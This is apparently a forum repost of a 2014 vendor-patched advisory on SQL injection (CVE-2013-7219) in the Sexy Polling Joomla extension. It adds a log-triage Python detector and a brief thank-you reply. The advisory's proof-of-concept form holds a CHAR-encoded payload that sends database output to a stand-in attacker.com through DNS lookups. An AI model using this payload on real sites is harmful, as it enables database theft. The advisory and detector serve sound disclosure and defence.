Sexy Polling Joomla Extension SQL Injection
#1

Advisory ID: HTB23193
Product: Sexy Polling Joomla Extension
Vendor: 2GLux
Vulnerable Version(s): 1.0.8 and probably prior
Tested Version: 1.0.8
Advisory Publication: December 26, 2013 [without technical details]
Vendor Notification: December 26, 2013
Vendor Patch: January 8, 2014
Public Disclosure: January 16, 2014
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2013-7219
Risk Level: High
CVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )


-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered a vulnerability in Sexy Polling Joomla Extension, which can be exploited to perform SQL Injection attacks.

1) SQL Injection in Sexy Polling Joomla Extension: CVE-2013-7219

The vulnerability exists due to insufficient validation of the "answer_id[]" HTTP POST parameter passed to the "/components/com_sexypolling/vote.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in the application's database.

The following exploitation example is based on the DNS exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding the IP address for the `version()` (or any other sensitive output from the database) subdomain of ".attacker.com" (a domain name, the DNS server of which is controlled by the attacker):


Code:
<form action="http://[host]/components/com_sexypolling/vote.php"
method="post" name="main">
<input type="hidden" name="answer_id[]" value="',(select load_file(CONCAT(CHAR(92),CHAR(92),(select
version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(
107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),
CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))),'','','',''
,'')
-- ">
<input type="submit" id="btn">
</form>
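A defensive check for the flaw described in the advisory above, as an added example that is not part of the original post or the vendor's patch: it flags POST requests to the vote script whose "answer_id[]" values are not plain integers. It assumes answer ids are unsigned decimal integers and that request bodies are available (for example from a WAF or audit log); the sample records and the `poll` field are constructed.

```python
import re
from urllib.parse import parse_qsl

# Script path and parameter name are taken from the advisory text.
VOTE_PATH = "/components/com_sexypolling/vote.php"
PARAM = "answer_id[]"
# Assumption: a legitimate answer id is a short unsigned decimal integer.
VALID_ID = re.compile(r"[0-9]{1,10}")


def suspicious_answer_ids(path, body):
    """Return the answer_id[] values in a urlencoded POST body that are not plain integers."""
    if path.split("?", 1)[0] != VOTE_PATH:
        return []
    bad = []
    # parse_qsl percent-decodes names and values, so "answer_id%5B%5D" matches as well.
    for name, value in parse_qsl(body, keep_blank_values=True):
        if name == PARAM and not VALID_ID.fullmatch(value):
            bad.append(value)
    return bad


def triage(records):
    """Return (client, offending_values) for every logged POST that fails the check."""
    return [(r["client"], bad) for r in records
            if r["method"] == "POST"
            and (bad := suspicious_answer_ids(r["path"], r["body"]))]


# Constructed sample records; "poll" is a made-up extra field, not the extension's own.
SAMPLE = [
    {"client": "198.51.100.7", "method": "POST", "path": VOTE_PATH,
     "body": "answer_id%5B%5D=12&answer_id%5B%5D=15&poll=3"},
    {"client": "203.0.113.9", "method": "POST", "path": VOTE_PATH,
     "body": "answer_id%5B%5D=12%27%2C%27x&poll=3"},
    {"client": "203.0.113.9", "method": "POST", "path": "/index.php",
     "body": "answer_id%5B%5D=abc"},
]

if __name__ == "__main__":
    for client, bad in triage(SAMPLE):
        print(client, bad)
```

The same integer-only rule can be enforced server-side before the value reaches any SQL statement; here it is used only to triage logged requests.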
#2
Well done, thanks.
People don't change; the only things that change are circumstances and interests...